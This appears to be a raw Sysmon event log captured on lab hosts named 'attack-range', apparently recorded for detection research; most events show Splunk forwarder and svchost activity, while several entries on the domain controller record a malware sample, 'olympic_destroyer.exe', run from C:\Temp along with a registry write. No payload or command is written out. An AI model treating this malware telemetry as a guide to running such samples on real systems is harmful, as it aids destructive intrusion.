10:52:47.768{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216997Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:52:47.768{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216996Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:52:47.768{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216995Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:52:47.768{4F8D34B0-F11B-6215-0500-000000003902}412532C:\Windows\system32\csrss.exe{4F8D34B0-11FF-6216-6804-000000003902}2108C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000216994Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:52:47.768{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-11FF-6216-6804-000000003902}2108C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000216993Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:52:47.773{4F8D34B0-11FF-6216-6804-000000003902}2108C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000216992Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:52:47.721{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D9A3F03D8C5F927B1A87B50355C384AF,SHA256=5AD1AE3DFCDAD4058C6D73ECE04D39AD78E344A3C5D71629B92B3CFAFB6AF0D9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000289074Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:47.455{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A0B732987C42E6275618973FD42CFBC6,SHA256=06BC83F49A0A7AB821B0A8F56B9EBD3C89FC54CA20D20AEA6714377C2FCBAEC1,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000216991Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:52:45.462{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51364-false10.0.1.12-8089- 10341000x8000000000000000216990Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:52:47.487{4F8D34B0-11FF-6216-6704-000000003902}11643304C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216989Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:52:47.268{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-11FF-6216-6704-000000003902}1164C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216988Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:52:47.268{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216987Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:52:47.268{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216986Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:52:47.268{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216985Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:52:47.268{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216984Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:52:47.268{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216983Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:52:47.268{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216982Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:52:47.268{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216981Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:52:47.268{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216980Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:52:47.268{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216979Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:52:47.268{4F8D34B0-F11B-6215-0500-000000003902}412428C:\Windows\system32\csrss.exe{4F8D34B0-11FF-6216-6704-000000003902}1164C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000216978Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:52:47.268{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-11FF-6216-6704-000000003902}1164C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000216977Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:52:47.269{4F8D34B0-11FF-6216-6704-000000003902}1164C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000289073Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:47.254{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-11FF-6216-2A05-000000003802}6332C:\Temp\olympic_destroyer.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000289072Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localInvDBSetValue2022-02-23 10:52:47.254{C8EA50B7-F11F-6215-1400-000000003802}1048C:\Windows\System32\svchost.exeHKU\S-1-5-21-1032146228-2128790581-2941542908-500\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Store\C:\Temp\olympic_destroyer.exeBinary Data 10341000x8000000000000000289071Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:47.239{C8EA50B7-F11F-6215-1400-000000003802}10481152C:\Windows\System32\svchost.exe{C8EA50B7-11FF-6216-2A05-000000003802}6332C:\Temp\olympic_destroyer.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\pcasvc.dll+52e4|c:\windows\system32\pcasvc.dll+58a9|c:\windows\system32\pcasvc.dll+5b49|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+3534e|C:\Windows\System32\RPCRT4.dll+20cc7|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289070Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:47.239{C8EA50B7-F11F-6215-1400-000000003802}10481152C:\Windows\System32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1440C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+5bab|c:\windows\system32\pcasvc.dll+5b07|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+3534e|C:\Windows\System32\RPCRT4.dll+20cc7|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289069Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:47.208{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289068Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:47.208{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 